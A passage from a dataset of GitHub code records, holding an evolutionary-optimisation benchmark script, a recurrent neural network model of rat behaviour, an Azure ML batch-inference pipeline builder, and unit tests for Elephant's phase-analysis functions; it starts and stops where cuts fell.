FloatSolution) -> FloatSolution:\n        n_rev = 1 / solution.number_of_variables\n        x = solution.variables\n        sum_of_sqr = 0\n        sum_of_cos = 0\n\n        for i in range(solution.number_of_variables):\n            sum_of_sqr += x[i] * x[i]\n            sum_of_cos += math.cos(2 * math.pi * x[i])\n\n        result = -20 * math.exp(-0.2 * math.sqrt(n_rev * sum_of_sqr)) \\\n            - math.exp(n_rev * sum_of_cos) + 20 + math.exp(1)\n\n        solution.objectives[0] = result\n\n        return solution\n\n    def get_name(self) -> str:\n        return \"Ackle's\"\n\n\nclass Schwefel(FloatProblem):\n    def __init__(self, number_of_variables: int = 10):\n        super().__init__()\n        self.number_of_objectives = 1\n        self.number_of_variables = number_of_variables\n        self.number_of_constraints = 0\n\n        self.obj_directions = [self.MINIMIZE]\n        self.obj_labels = ['f(x)']\n\n        self.lower_bound = [-5.12 for _ in range(number_of_variables)]\n        self.upper_bound = [5.12 for _ in range(number_of_variables)]\n\n        FloatSolution.lower_bound = self.lower_bound\n        FloatSolution.upper_bound = self.upper_bound\n\n    def evaluate(self, solution: FloatSolution) -> FloatSolution:\n        a = 418.9829\n        result = a * solution.number_of_variables\n        x = solution.variables\n\n        for i in range(solution.number_of_variables):\n            result -= x[i] * math.sin(math.sqrt(abs(x[i])))\n\n        solution.objectives[0] = result\n        return solution\n\n    def get_name(self) -> str:\n        return \"Schwefel's\"\n\n\nclass DiscreteCrossover(Crossover[FloatSolution, FloatSolution]):\n    def __init__(self, probability: float):\n        super(DiscreteCrossover, self).__init__(probability=probability)\n\n    def execute(self, parents: List[FloatSolution]) -> List[FloatSolution]:\n        if len(parents) != 2:\n            raise Exception('The number of parents is: {}, expected: 2'.format(len(parents)))\n\n        offspring = [copy.deepcopy(parents[0]), copy.deepcopy(parents[1])]\n        rand = random.random()\n\n        if rand <= self.probability:\n            
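# discrete (uniform) crossover: each gene is taken from one parent or the\n            # other on an independent coin flip, and the second child receives the\n            # complementary choice\n            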
permut_len = offspring[0].number_of_variables\n for i in range(permut_len):\n rand = random.random()\n offspring[0].variables[i] = parents[0].variables[i] if rand <= 0.5 else parents[1].variables[i]\n offspring[1].variables[i] = parents[0].variables[i] if rand > 0.5 else parents[1].variables[i]\n\n return offspring\n\n def get_number_of_parents(self) -> int:\n return 2\n\n def get_number_of_children(self) -> int:\n return 2\n\n def get_name(self):\n return 'Discrete crossover'\n\n\nclass DataObserver(Observer):\n\n def __init__(self, frequency: float = 1.0, data = []) -> None:\n \"\"\" Show the number of evaluations, best fitness and computing time.\n :param frequency: Display frequency. \"\"\"\n self.display_frequency = frequency\n self.data = data\n\n def update(self, *args, **kwargs):\n computing_time = kwargs['COMPUTING_TIME']\n evaluations = kwargs['EVALUATIONS']\n solutions = kwargs['SOLUTIONS']\n\n if (evaluations % self.display_frequency) == 0 and solutions:\n if type(solutions) == list:\n fitness = solutions[0].objectives\n else:\n fitness = solutions.objectives\n self.data.append(fitness[0])\n\n\ndef solve(problem, cloning_param, mutation):\n final_data = []\n final_problem = problem(dim)\n final_mutation = mutation(mut_pb, 20)\n\n for x in range(repetitions):\n algorithm = CloneAlg(\n problem=final_problem,\n population_size=100,\n offspring_population_size=100,\n mutation=final_mutation,\n cloning_param=cloning_param,\n termination_criterion=StoppingByEvaluations(max_evaluations=5000)\n )\n data = []\n dataobserver = DataObserver(1.0, data)\n algorithm.observable.register(observer=dataobserver)\n algorithm.run()\n final_data.append(data)\n\n trans_list = np.array(final_data).T.tolist()\n\n fig = plt.figure(figsize=(10, 7))\n ax = fig.add_axes([0, 0, 1, 1])\n bp = ax.boxplot(trans_list)\n plt.title(\"Problem: {0} benchmark, dim: {1}, cloning_param: {2}, mutation: {3}\".format(\n final_problem.get_name(),\n dim,\n algorithm.get_cloning_param(),\n final_mutation.get_name()))\n plt.show()\n\n # Kruskal-Wallis and Dunn tests\n print(stats.kruskal(trans_list[0], trans_list[1], trans_list[-1]))\n sp.posthoc_dunn([trans_list[0], trans_list[1], trans_list[-1]], p_adjust='holm')\n\n\nrepetitions = 10\ndim = 50\nmut_pb = 0.8\n\n[solve(problem, cloning_param, mutation)\n for problem in [Ackle, Schwefel]\n for cloning_param in [0.1, 0.3, 0.6, 0.9]\n for mutation in [UniformMutation, PolynomialMutation]]","repo_name":"wiktorgoral/Evolutionary-Project","sub_path":"clonalSelection/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6934604156","text":"import numpy as npp\nimport minpy.numpy as np\nfrom minpy.nn.model import ModelBase\nfrom minpy.nn import layers\n\nclass VirtualRatModel(ModelBase):\n \"\"\"\n Virtual rat model. 
An Elman recurrent neural network that takes inputs and output actions for each time step.\n This model can be trained with either supervised learning or reinforcement learning.\n \"\"\"\n def __init__(self, N=1, input_dim=5, hidden_dim=20, output_dim=3,\n gamma=0.99, reg=0.1, noise_factor = 0, total_time_steps=5): \n super(VirtualRatModel, self).__init__()\n self.input_dim = input_dim # (pro, anti, left, right, trial=1)\n self.hidden_dim = hidden_dim # Number of hidden recurrent unit.\n self.output_dim = output_dim # (left, right, do nothing/others)\n self.gamma = gamma # Reward discounting rate.\n self.reg = reg # Regularization strength for L2 regularization.\n self.noise_factor = noise_factor # Coefficient for the strength of noise.\n self.total_time_steps = total_time_steps # Total time steps within each trial.\n # Initialize h0\n self.h0 = np.zeros((N, hidden_dim))\n self.h = self.h0\n self.activation_history = np.zeros((0,N,hidden_dim))\n\n # Initialize parameters for the RNN\n self.add_param(name = 'Wx', shape = (input_dim, hidden_dim))\n self.add_param(name = 'Wh', shape = (hidden_dim, hidden_dim))\n self.add_param(name = 'b', shape = (hidden_dim,))\n\n # Initialize output to vocab weights\n self.add_param(name = 'Wa', shape = (hidden_dim, output_dim))\n self.add_param(name = 'ba', shape = (output_dim,))\n\n self.activation_mask = np.ones((self.total_time_steps,self.hidden_dim))\n self.activation_offset = np.zeros((self.total_time_steps,self.hidden_dim))\n self.tanh_mask = np.ones((self.total_time_steps,self.hidden_dim))\n\n def reset_h(self):\n # Reset hidden activation.\n self.h = self.h0\n\n def reset_history(self):\n # Reset activation history. Call this mothod before testing.\n self.activation_history = np.zeros((0,1,self.hidden_dim))\n\n def get_activation_history(self):\n # Returns activation history in Numpy array, instead of minpy's numpy array.\n return self.activation_history.asnumpy()\n\n def lesion(self, mask = None, offset = None):\n \"\"\"\n Introduce lesion to activation carryover.\n Inputs:\n - time_steps: a tuple, list, or numpy array of shape (M,), \n each element corresponds to a time step.\n - num_neuron: a tuple, list, or numpy array of shape (M,), \n each element corresponds to a index of hidden unit.\n \"\"\"\n self.activation_mask = np.ones((self.total_time_steps,self.hidden_dim))\n self.activation_offset = np.zeros((self.total_time_steps,self.hidden_dim))\n if mask is not None:\n self.activation_mask = mask\n if offset is not None:\n self.activation_offset = offset\n\n def step_forward(self, X):\n \"\"\"\n Each time step calls forward() once. 
This is necessary for sampling.\n Inputs:\n - X: (N,D) shape\n \"\"\"\n N = X.shape[0]\n output_dim = 3\n\n if X[0,-1] == 1:\n self.h[0,:] = np.zeros((self.hidden_dim,))\n self.h = self._rnn_step(X[:,:], self.h, self.params['Wx'], self.params[\"Wh\"], \n self.params[\"b\"])\n yy = layers.affine(self.h, self.params['Wa'], self.params[\"ba\"]).reshape([N, 1, output_dim])\n numorator = np.exp(yy - np.max(yy, axis=2, keepdims=True))\n denomenator = np.sum(numorator,axis=2,keepdims=True)\n p = numorator/denomenator\n return p\n\n def forward(self, X):\n \"\"\"\n Forward pass for the whole sequence, like supervised learning.\n Inputs:\n - X: (N, T, D) shape\n \"\"\"\n N, T, _ = X.shape\n output_dim = 3\n h_history = np.zeros((T,N,self.hidden_dim))\n y = np.zeros((N,0,output_dim))\n prev_h = self.h0\n for t in xrange(T):\n if X[0,t,-1] == 1:\n prev_h[0,:] = np.zeros((self.hidden_dim,))\n h = self._rnn_step(X[:,t,:], prev_h, self.params['Wx'], self.params[\"Wh\"], \n self.params[\"b\"], self.tanh_mask[t % self.total_time_steps,:])\n \n # Mask certain activations\n hh = h * self.activation_mask[t % self.total_time_steps,:] \\\n + self.activation_offset[t % self.total_time_steps,:]\n\n prev_h = hh \n\n h_history[t,:,:] = hh\n\n yy = layers.affine(hh, self.params['Wa'], self.params[\"ba\"]).reshape([N, 1, output_dim])\n y = np.append(y,yy,axis=1)\n\n numorator = np.exp(y - np.max(y, axis=2, keepdims=True))\n denomenator = np.sum(numorator,axis=2,keepdims=True)\n ps = numorator/denomenator\n self.activation_history = np.append(self.activation_history,h_history,axis=0)\n return ps\n\n def _rnn_step(self, x, prev_h, Wx, Wh, b, tanh_vector=None):\n \"\"\"\n Run the forward pass for a single timestep of a vanilla RNN that uses a tanh\n activation function.\n\n The input data has dimension D, the hidden state has dimension H, and we use\n a minibatch size of N.\n\n Inputs:\n - x: Input data for this timestep, of shape (N, D).\n - prev_h: Hidden state from previous timestep, of shape (N, H)\n - Wx: Weight matrix for input-to-hidden connections, of shape (D, H)\n - Wh: Weight matrix for hidden-to-hidden connections, of shape (H, H)\n - b: Biases of shape (H,)\n\n Returns a tuple of:\n - next_h: Next hidden state, of shape (N, H)\n \"\"\"\n score = np.dot(x, Wx) + np.dot(prev_h, Wh) + b\n score_with_noise = score+ self.noise_factor * np.random.normal(0,1,self.hidden_dim) # White noise with mu=0, sigma=1\n if tanh_vector:\n next_h = np.tanh(( score_with_noise / tanh_vector)) \n else:\n next_h = np.tanh(score_with_noise) \n return next_h\n\n\n def choose_action(self, p):\n \"\"\"\n Input:\n -p: (1,1,D) shape\n \"\"\"\n u = npp.random.uniform()\n p = p[0,0,:]\n a = (npp.cumsum(p) > u).argmax()\n y = a\n return a, y\n\n def loss(self, ps, ys, rs):\n \"\"\"\n Input\n - ps: (N, T, C)\n - ys: (T, N)\n - rs: (T, N)\n \"\"\"\n N, T, C = ps.shape\n ps = np.maximum(1.0e-5, np.minimum(1.0 - 1e-5, ps))\n #convert it to one hot encoding\n onehot_label = np.zeros([N, T, C])\n for t in xrange(T):\n np.onehot_encode(ys[t,:], onehot_label[:,t,:])\n loss = -np.sum(np.sum(np.log(ps) * onehot_label, axis=2) * rs)\n if self.reg>0:\n regloss = loss + 0.5 * self.reg * np.sum(np.sum(self.params['Wh'] * self.params['Wh']) + \\\n np.sum(self.params['Wx'] * self.params['Wx']) + np.sum(self.params['b'] * self.params['b']) + \\\n np.sum(self.params['Wa'] * self.params['Wa']) + np.sum(self.params['ba'] * self.params['ba']))\n else:\n regloss = loss\n return regloss\n\n def discount_rewards(self, rs):\n \"\"\"\n Discount rewards for 
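the policy-gradient loss above, as is standard in 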
reinforcement learning.\n \"\"\"\n drs = npp.zeros_like(rs, dtype=npp.float)\n s = 0\n for t in reversed(xrange(0, len(rs))):\n # Reset the running sum at a game boundary.\n if rs[t] != 0:\n s = 0\n s = s * self.gamma + rs[t]\n drs[t] = s\n drs -= np.mean(drs)\n drs /= np.std(drs)\n return drs\n\n\n\n","repo_name":"jacklxc/Virtual-Rat","sub_path":"model/VirtualRatModel.py","file_name":"VirtualRatModel.py","file_ext":"py","file_size_in_byte":7653,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"5404693491","text":"import json, os\n\nfrom azureml.core import Workspace, Experiment, Datastore, Dataset, ComputeTarget, RunConfiguration, Environment, Model\nfrom azureml.core.runconfig import CondaDependencies\nfrom azureml.pipeline.core import Pipeline, PipelineData, PipelineParameter\nfrom azureml.contrib.pipeline.steps import ParallelRunStep, ParallelRunConfig\nfrom azureml.data.datapath import DataPath, DataPathComputeBinding\nfrom azureml.pipeline.steps import PythonScriptStep\n\n\ndef create_experiment_config(workspace):\n ########################################\n ### Creating data prep Pipeline Step ###\n ########################################\n\n # Load settings\n print(\"Loading settings\")\n data_prep_step_path = os.path.join(\"steps\", \"data_prep\")\n with open(os.path.join(data_prep_step_path, \"step.json\")) as f:\n data_prep_settings = json.load(f)\n \n # Setup datasets - Create PipelineParameter for dynamic pipeline input\n print(\"Setting up datasets with dynamic input\")\n data_prep_input_path = DataPath(\n datastore=Datastore(workspace=workspace, name=data_prep_settings.get(\"datastore_input_name\", \"workspaceblobstore\")),\n path_on_datastore=\"golden/Atlantis/PAX1/15-Mar-2020-23-37-50-279971/PAX1.parquet/\"\n )\n data_prep_input_path_pipeline_parameter = PipelineParameter(\n name=\"input_path\",\n default_value=data_prep_input_path\n )\n data_prep_input = (data_prep_input_path_pipeline_parameter, DataPathComputeBinding(mode=\"mount\"))\n data_prep_output = PipelineData(\n name=data_prep_settings.get(\"dataset_output_name\", None),\n datastore=Datastore(workspace=workspace, name=data_prep_settings.get(\"datastore_output_name\", \"workspaceblobstore\")),\n output_mode=\"mount\"\n ).as_dataset()\n # Uncomment next lines, if you want to register intermediate dataset\n #data_prep_output.register(\n # name=data_prep_settings.get(\"dataset_output_name\", None),\n # create_new_version=True\n #)\n\n # Create conda dependencies\n print(\"Creating conda dependencies\")\n data_prep_dependencies = CondaDependencies.create(\n pip_packages=data_prep_settings.get(\"pip_packages\", []),\n conda_packages=data_prep_settings.get(\"conda_packages\", []),\n python_version=data_prep_settings.get(\"python_version\", \"3.6.2\")\n )\n\n # Create run configuration\n print(\"Creating RunConfiguration\")\n data_prep_run_config = RunConfiguration(\n conda_dependencies=data_prep_dependencies,\n framework=data_prep_settings.get(\"framework\", \"Python\")\n )\n\n # Loading compute target \n print(\"Loading ComputeTarget\")\n data_prep_compute_target = ComputeTarget(\n workspace=workspace,\n name=data_prep_settings.get(\"compute_target_name\", None)\n )\n\n # Create python step\n print(\"Creating Step\")\n data_prep = PythonScriptStep(\n name=data_prep_settings.get(\"step_name\", None),\n script_name=data_prep_settings.get(\"script_name\", None),\n arguments=data_prep_settings.get(\"arguments\", []) + [\"--input-datapath\", data_prep_input],\n 
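# the DataPath pipeline parameter is deliberately passed twice: as a CLI\n        # argument here and as a mounted input below, so the script receives the\n        # resolved mount path at run time\n        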
compute_target=data_prep_compute_target,\n runconfig=data_prep_run_config,\n inputs=[data_prep_input],\n outputs=[data_prep_output],\n params=data_prep_settings.get(\"parameters\", []),\n source_directory=data_prep_step_path,\n allow_reuse=data_prep_settings.get(\"allow_reuse\", True),\n version=data_prep_settings.get(\"version\", None),\n )\n\n ############################################\n ### Creating inference Parallel Run Step ###\n ############################################\n\n # Load settings\n print(\"Loading settings\")\n batch_inference_step_path = os.path.join(\"steps\", \"batch_inference\")\n with open(os.path.join(batch_inference_step_path, \"step.json\")) as f:\n batch_inference_settings = json.load(f)\n\n # Setup datasets of first step\n print(\"Setting up datasets\")\n batch_inference_input = data_prep_output.as_named_input(name=batch_inference_settings.get(\"dataset_input_name\", None))\n batch_inference_output = PipelineData(\n name=batch_inference_settings.get(\"dataset_output_name\", None),\n datastore=Datastore(workspace=workspace, name=batch_inference_settings.get(\"datastore_output_name\", None)),\n output_mode=\"mount\",\n ).as_dataset()\n # Uncomment next lines, if you want to register intermediate dataset\n #batch_inference_output.register(\n # name=batch_inference_settings.get(\"dataset_output_name\", None),\n # create_new_version=True\n #)\n\n # Create conda dependencies\n print(\"Creating conda dependencies\")\n batch_inference_dependencies = CondaDependencies.create(\n pip_packages=batch_inference_settings.get(\"pip_packages\", []),\n conda_packages=batch_inference_settings.get(\"conda_packages\", []),\n python_version=batch_inference_settings.get(\"python_version\", \"3.6.2\")\n )\n\n # Create run configuration\n print(\"Creating RunConfiguration\")\n data_prep_run_config = RunConfiguration(\n conda_dependencies=batch_inference_dependencies,\n framework=batch_inference_settings.get(\"framework\", \"Python\")\n )\n\n # Loading compute target \n print(\"Loading ComputeTarget\")\n batch_inference_compute_target = ComputeTarget(\n workspace=workspace,\n name=batch_inference_settings.get(\"compute_target_name\", None)\n )\n\n # Create python step\n print(\"Creating Step\")\n batch_inference = PythonScriptStep(\n name=batch_inference_settings.get(\"step_name\", None),\n script_name=batch_inference_settings.get(\"script_name\", None),\n arguments=batch_inference_settings.get(\"arguments\", []),\n compute_target=batch_inference_compute_target,\n runconfig=data_prep_run_config,\n inputs=[batch_inference_input],\n outputs=[batch_inference_output],\n params=batch_inference_settings.get(\"parameters\", []),\n source_directory=batch_inference_step_path,\n allow_reuse=batch_inference_settings.get(\"allow_reuse\", True),\n version=batch_inference_settings.get(\"version\", None),\n )\n \n #########################\n ### Creating Pipeline ###\n #########################\n\n # Create Pipeline\n print(\"Creating Pipeline\")\n pipeline = Pipeline(\n workspace=workspace,\n steps=[batch_inference],\n description=\"Batch Inference Pipeline\",\n )\n\n return pipeline\n\n\nif __name__ == \"__main__\":\n # Load workspace\n print(\"Load Workspace\")\n ws = Workspace.from_config()\n\n # Load experiment config\n print(\"Loading experiment config\")\n config = create_experiment_config(workspace=ws)\n\n # Load experiment\n print(\"Loading experiment\")\n experiment = Experiment(\n workspace=ws,\n name=\"myexperiment_inference\"\n )\n\n # Submit experiment config\n print(\"Submitting 
experiment config\")\n run = experiment.submit(\n config=config,\n tags={}\n )\n run.wait_for_completion(show_output=True)","repo_name":"soniaang/ProjectGemini","sub_path":"inference_pipeline/inference_pipeline.py","file_name":"inference_pipeline.py","file_ext":"py","file_size_in_byte":7010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37726227222","text":"from __future__ import division, print_function\n\nimport unittest\n\nimport numpy as np\nimport quantities as pq\nimport scipy.io\nfrom neo import SpikeTrain, AnalogSignal\nfrom numpy.ma.testutils import assert_allclose\n\nimport elephant.phase_analysis\nfrom elephant.datasets import download_datasets\n\n\nclass SpikeTriggeredPhaseTestCase(unittest.TestCase):\n\n def setUp(self):\n tlen0 = 100 * pq.s\n f0 = 20. * pq.Hz\n fs0 = 1 * pq.ms\n t0 = np.arange(\n 0, tlen0.rescale(pq.s).magnitude,\n fs0.rescale(pq.s).magnitude) * pq.s\n self.anasig0 = AnalogSignal(\n np.sin(2 * np.pi * (f0 * t0).simplified.magnitude),\n units=pq.mV, t_start=0 * pq.ms, sampling_period=fs0)\n self.st0 = SpikeTrain(\n np.arange(50, tlen0.rescale(pq.ms).magnitude - 50, 50) * pq.ms,\n t_start=0 * pq.ms, t_stop=tlen0)\n self.st1 = SpikeTrain(\n [100., 100.1, 100.2, 100.3, 100.9, 101.] * pq.ms,\n t_start=0 * pq.ms, t_stop=tlen0)\n\n def test_perfect_locking_one_spiketrain_one_signal(self):\n phases, amps, times = elephant.phase_analysis.spike_triggered_phase(\n elephant.signal_processing.hilbert(self.anasig0),\n self.st0,\n interpolate=True)\n\n assert_allclose(phases[0], - np.pi / 2.)\n assert_allclose(amps[0], 1, atol=0.1)\n assert_allclose(times[0].magnitude, self.st0.magnitude)\n self.assertEqual(len(phases[0]), len(self.st0))\n self.assertEqual(len(amps[0]), len(self.st0))\n self.assertEqual(len(times[0]), len(self.st0))\n\n def test_perfect_locking_many_spiketrains_many_signals(self):\n phases, amps, times = elephant.phase_analysis.spike_triggered_phase(\n [\n elephant.signal_processing.hilbert(self.anasig0),\n elephant.signal_processing.hilbert(self.anasig0)],\n [self.st0, self.st0],\n interpolate=True)\n\n assert_allclose(phases[0], -np.pi / 2.)\n assert_allclose(amps[0], 1, atol=0.1)\n assert_allclose(times[0].magnitude, self.st0.magnitude)\n self.assertEqual(len(phases[0]), len(self.st0))\n self.assertEqual(len(amps[0]), len(self.st0))\n self.assertEqual(len(times[0]), len(self.st0))\n\n def test_perfect_locking_one_spiketrains_many_signals(self):\n phases, amps, times = elephant.phase_analysis.spike_triggered_phase(\n [\n elephant.signal_processing.hilbert(self.anasig0),\n elephant.signal_processing.hilbert(self.anasig0)],\n [self.st0],\n interpolate=True)\n\n assert_allclose(phases[0], -np.pi / 2.)\n assert_allclose(amps[0], 1, atol=0.1)\n assert_allclose(times[0].magnitude, self.st0.magnitude)\n self.assertEqual(len(phases[0]), len(self.st0))\n self.assertEqual(len(amps[0]), len(self.st0))\n self.assertEqual(len(times[0]), len(self.st0))\n\n def test_perfect_locking_many_spiketrains_one_signal(self):\n phases, amps, times = elephant.phase_analysis.spike_triggered_phase(\n elephant.signal_processing.hilbert(self.anasig0),\n [self.st0, self.st0],\n interpolate=True)\n\n assert_allclose(phases[0], -np.pi / 2.)\n assert_allclose(amps[0], 1, atol=0.1)\n assert_allclose(times[0].magnitude, self.st0.magnitude)\n self.assertEqual(len(phases[0]), len(self.st0))\n self.assertEqual(len(amps[0]), len(self.st0))\n self.assertEqual(len(times[0]), len(self.st0))\n\n def test_interpolate(self):\n 
phases_int, _, _ = elephant.phase_analysis.spike_triggered_phase(\n elephant.signal_processing.hilbert(self.anasig0),\n self.st1,\n interpolate=True)\n\n self.assertLess(phases_int[0][0], phases_int[0][1])\n self.assertLess(phases_int[0][1], phases_int[0][2])\n self.assertLess(phases_int[0][2], phases_int[0][3])\n self.assertLess(phases_int[0][3], phases_int[0][4])\n self.assertLess(phases_int[0][4], phases_int[0][5])\n\n phases_noint, _, _ = elephant.phase_analysis.spike_triggered_phase(\n elephant.signal_processing.hilbert(self.anasig0),\n self.st1,\n interpolate=False)\n\n self.assertEqual(phases_noint[0][0], phases_noint[0][1])\n self.assertEqual(phases_noint[0][1], phases_noint[0][2])\n self.assertEqual(phases_noint[0][2], phases_noint[0][3])\n self.assertEqual(phases_noint[0][3], phases_noint[0][4])\n self.assertNotEqual(phases_noint[0][4], phases_noint[0][5])\n\n # Verify that when using interpolation and the spike sits on the sample\n # of the Hilbert transform, this is the same result as when not using\n # interpolation with a spike slightly to the right\n self.assertEqual(phases_noint[0][2], phases_int[0][0])\n self.assertEqual(phases_noint[0][4], phases_int[0][0])\n\n def test_inconsistent_numbers_spiketrains_hilbert(self):\n self.assertRaises(\n ValueError, elephant.phase_analysis.spike_triggered_phase,\n [\n elephant.signal_processing.hilbert(self.anasig0),\n elephant.signal_processing.hilbert(self.anasig0)],\n [self.st0, self.st0, self.st0], False)\n\n self.assertRaises(\n ValueError, elephant.phase_analysis.spike_triggered_phase,\n [\n elephant.signal_processing.hilbert(self.anasig0),\n elephant.signal_processing.hilbert(self.anasig0)],\n [self.st0, self.st0, self.st0], False)\n\n def test_spike_earlier_than_hilbert(self):\n # This is a spike clearly outside the bounds\n st = SpikeTrain(\n [-50, 50],\n units='s', t_start=-100 * pq.s, t_stop=100 * pq.s)\n phases_noint, _, _ = elephant.phase_analysis.spike_triggered_phase(\n elephant.signal_processing.hilbert(self.anasig0),\n st,\n interpolate=False)\n self.assertEqual(len(phases_noint[0]), 1)\n\n # This is a spike right on the border (start of the signal is at 0s,\n # spike sits at t=0s). By definition of intervals in\n # Elephant (left borders inclusive, right borders exclusive), this\n # spike is to be considered.\n st = SpikeTrain(\n [0, 50],\n units='s', t_start=-100 * pq.s, t_stop=100 * pq.s)\n phases_noint, _, _ = elephant.phase_analysis.spike_triggered_phase(\n elephant.signal_processing.hilbert(self.anasig0),\n st,\n interpolate=False)\n self.assertEqual(len(phases_noint[0]), 2)\n\n def test_spike_later_than_hilbert(self):\n # This is a spike clearly outside the bounds\n st = SpikeTrain(\n [1, 250],\n units='s', t_start=-1 * pq.s, t_stop=300 * pq.s)\n phases_noint, _, _ = elephant.phase_analysis.spike_triggered_phase(\n elephant.signal_processing.hilbert(self.anasig0),\n st,\n interpolate=False)\n self.assertEqual(len(phases_noint[0]), 1)\n\n # This is a spike right on the border (length of the signal is 100s,\n # spike sits at t=100s). 
However, by definition of intervals in\n # Elephant (left borders inclusive, right borders exclusive), this\n # spike is not to be considered.\n st = SpikeTrain(\n [1, 100],\n units='s', t_start=-1 * pq.s, t_stop=200 * pq.s)\n phases_noint, _, _ = elephant.phase_analysis.spike_triggered_phase(\n elephant.signal_processing.hilbert(self.anasig0),\n st,\n interpolate=False)\n self.assertEqual(len(phases_noint[0]), 1)\n\n # This test handles the correct dealing with input signals that have\n # different time units, including a CompoundUnit\n def test_regression_269(self):\n # This is a spike train on a 30KHz sampling, one spike at 1s, one just\n # before the end of the signal\n cu = pq.CompoundUnit(\"1/30000.*s\")\n st = SpikeTrain(\n [30000., (self.anasig0.t_stop - 1 * pq.s).rescale(cu).magnitude],\n units=pq.CompoundUnit(\"1/30000.*s\"),\n t_start=-1 * pq.s, t_stop=300 * pq.s)\n phases_noint, _, _ = elephant.phase_analysis.spike_triggered_phase(\n elephant.signal_processing.hilbert(self.anasig0),\n st,\n interpolate=False)\n self.assertEqual(len(phases_noint[0]), 2)\n\n\nclass MeanVectorTestCase(unittest.TestCase):\n def setUp(self):\n self.tolerance = 1e-15\n self.n_samples = 200\n # create a sample with all values equal to a random phase-lock phi\n self.lock_value_phi = np.random.uniform(-np.pi, np.pi, 1)\n self.dataset1 = np.ones(self.n_samples) * self.lock_value_phi\n # create a evenly spaced / uniform distribution\n self.dataset2 = np.arange(0, 2 * np.pi, (2 * np.pi) / self.n_samples)\n # create a random distribution\n self.dataset3 = np.random.uniform(-np.pi, np.pi, self.n_samples)\n\n def testMeanVector_direction_is_phi_and_length_is_1(self):\n \"\"\"\n Test if the mean vector length is 1 and if the mean direction is phi\n for a sample with all phases equal to phi on the unit circle.\n\n \"\"\"\n theta_bar_1, r_1 = elephant.phase_analysis.mean_phase_vector(\n self.dataset1)\n # mean direction must be phi\n self.assertAlmostEqual(theta_bar_1, self.lock_value_phi,\n delta=self.tolerance)\n # mean vector length must be almost equal 1\n self.assertAlmostEqual(r_1, 1, delta=self.tolerance)\n\n def testMeanVector_length_is_0(self):\n \"\"\"\n Test if the mean vector length is 0 for a evenly spaced distribution\n on the unit circle.\n \"\"\"\n theta_bar_2, r_2 = elephant.phase_analysis.mean_phase_vector(\n self.dataset2)\n # mean vector length must be almost equal 0\n self.assertAlmostEqual(r_2, 0, delta=self.tolerance)\n\n def testMeanVector_ranges_of_direction_and_length(self):\n \"\"\"\n Test if the range of the mean vector direction follows numpy standard\n and is within (-pi, pi].\n Test if the range of the mean vector length is within [0, 1].\n \"\"\"\n theta_bar_3, r_3 = elephant.phase_analysis.mean_phase_vector(\n self.dataset3)\n # mean vector direction\n self.assertTrue(-np.pi < theta_bar_3 <= np.pi)\n # mean vector length\n self.assertTrue(0 <= r_3 <= 1)\n\n\nclass PhaseDifferenceTestCase(unittest.TestCase):\n def setUp(self):\n self.tolerance = 1e-15\n self.n_samples = 200\n\n def testPhaseDifference_in_range_minus_pi_to_pi(self):\n \"\"\"\n Test if the range of the phase difference is within [-pi, pi] for\n random pairs of alpha and beta.\n \"\"\"\n alpha = np.random.uniform(-np.pi, np.pi, self.n_samples)\n beta = np.random.uniform(-np.pi, np.pi, self.n_samples)\n\n phase_diff = elephant.phase_analysis.phase_difference(alpha, beta)\n self.assertTrue((-np.pi <= phase_diff).all()\n and (phase_diff <= np.pi).all())\n\n def testPhaseDifference_is_delta(self):\n \"\"\"\n Test if the 
phase difference equals delta for random pairs of\n        alpha and beta, where beta is a copy of alpha shifted by delta.\n        \"\"\"\n        delta = np.random.uniform(-np.pi, np.pi, self.n_samples)\n        alpha = np.random.uniform(-np.pi, np.pi, self.n_samples)\n        _beta = alpha - delta\n        beta = np.arctan2(np.sin(_beta), np.cos(_beta))\n\n        phase_diff = elephant.phase_analysis.phase_difference(alpha, beta)\n        np.testing.assert_allclose(phase_diff, delta, atol=1e-10)\n\n\nclass PhaseLockingValueTestCase(unittest.TestCase):\n    def setUp(self):\n        self.tolerance = 1e-15\n        self.phase_shift = np.pi / 4\n        self.num_time_points = 1000\n        self.num_trials = 100\n\n        # create two random uniform distributions (all trials are identical)\n        self.signal_x = \\\n            np.full([self.num_trials, self.num_time_points],\n                    np.random.uniform(-np.pi, np.pi, self.num_time_points))\n        self.signal_y = \\\n            np.full([self.num_trials, self.num_time_points],\n                    np.random.uniform(-np.pi, np.pi, self.num_time_points))\n\n        # create two random uniform distributions, where all trials are random\n        self.random_x = np.random.uniform(\n            -np.pi, np.pi, (1000, self.num_time_points))\n        self.random_y = np.random.uniform(\n            -np.pi, np.pi, (1000, self.num_time_points))\n\n        # simple samples of different shapes to check error raising\n        self.simple_x = np.array([[0, -np.pi, np.pi], [0, -np.pi, np.pi]])\n        self.simple_y = np.array([0, -np.pi, np.pi])\n        self.simple_z = np.array([0, np.pi, np.pi / 2, -np.pi])\n\n    def testPhaseLockingValue_identical_signals_both_identical_trials(self):\n        \"\"\"\n        Test if the PLVs are 1, when 2 identical signals with identical\n        trials are passed. The PLVs need to be 1, due to the constant phase\n        difference of 0 across trials at each time-point.\n        \"\"\"\n        list1_plv_t = \\\n            elephant.phase_analysis.phase_locking_value(self.signal_x,\n                                                        self.signal_x)\n        target_plv_r_is_one = np.ones_like(list1_plv_t)\n        np.testing.assert_allclose(list1_plv_t, target_plv_r_is_one,\n                                   self.tolerance)\n\n    def testPhaseLockingValue_different_signals_both_identical_trials(self):\n        \"\"\"\n        Test if the PLVs are 1, when 2 different signals are passed, where\n        within each signal the trials are identical. The PLVs need to be 1,\n        due to a constant phase difference across trials, which may vary for\n        different time-points.\n        \"\"\"\n        list2_plv_t = elephant.phase_analysis.phase_locking_value(\n            self.signal_x, self.signal_y)\n        target_plv_r_is_one = np.ones_like(list2_plv_t)\n        np.testing.assert_allclose(list2_plv_t, target_plv_r_is_one,\n                                   atol=3e-15)\n\n    def testPhaseLockingValue_different_signals_both_different_trials(self):\n        \"\"\"\n        Test if the PLVs are close to 0, when 2 different signals are passed,\n        where both have different trials, which are all randomly distributed.\n        The PLVs need to be close to 0, due to a random\n        phase difference across trials for each time-point.\n        \"\"\"\n        list3_plv_t = elephant.phase_analysis.phase_locking_value(\n            self.random_x, self.random_y)\n        target_plv_is_zero = np.zeros_like(list3_plv_t)\n        # use default value from np.allclose() for atol=1e-8 to prevent failure\n        